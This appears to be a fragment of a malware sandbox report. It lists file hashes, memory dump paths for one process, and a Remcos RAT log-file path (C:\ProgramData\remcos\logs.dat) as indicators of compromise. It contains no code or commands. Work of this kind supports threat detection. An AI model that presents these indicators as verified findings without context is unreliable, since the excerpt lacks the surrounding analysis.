MD5 a1bddc459fed1257cf502519a8f006e4
SHA1 2f049cf8f9820974345cab8c0f6a4261aeca1c92
SHA256 cc5e9b537059712f6b6e3433a143717a293df85a135f7363add0f0c09ab028e6
SHA512 c905405b73ec384e69c299b91ecc62903b7fcba89837042ea55d3fbc9a5454b4ae3b7118f5e790660c8550a188c9d1c7ac91bfd2a81e45dc596fef96a1b05217

memory/5072-359-0x0000000000730000-0x0000000001984000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 33ada7972064d953757855248afc3f33
SHA1 ca686683afdec4fe75ba117673b7a74ef2083aef
SHA256 0f010d83b58c24c92af97a83bd69fdcafcac5b8bb4d67b06da3af376fa88a3fe
SHA512 f74522e97e9a371bb05d537b65050b2be26177fefbfaf7c66f02ca3711043a5184c480145564a7fcd6976d6fca682c39a06ea1f7a0306af114621a46294c7c0a

memory/5072-395-0x0000000000730000-0x0000000001984000-memory.dmp

memory/5072-397-0x0000000000730000-0x0000000001984000-memory.dmp

memory/5072-400-0x0000000000730000-0x0000000001984000-memory.dmp

memory/5072-403-0x0000000000730000-0x0000000001984000-memory.dmp

memory/5072-406-0x0000000000730000-0x0000000001984000-memory.dmp

memory/5072-409-0x0000000000730000-0x0000000001984000-memory.dmp

memory/5072-412-0x0000000000730000-0x0000000001984000-memory.dmp

memory/5072-415-0x0000000000730000-0x0000000001984000-memory.dmp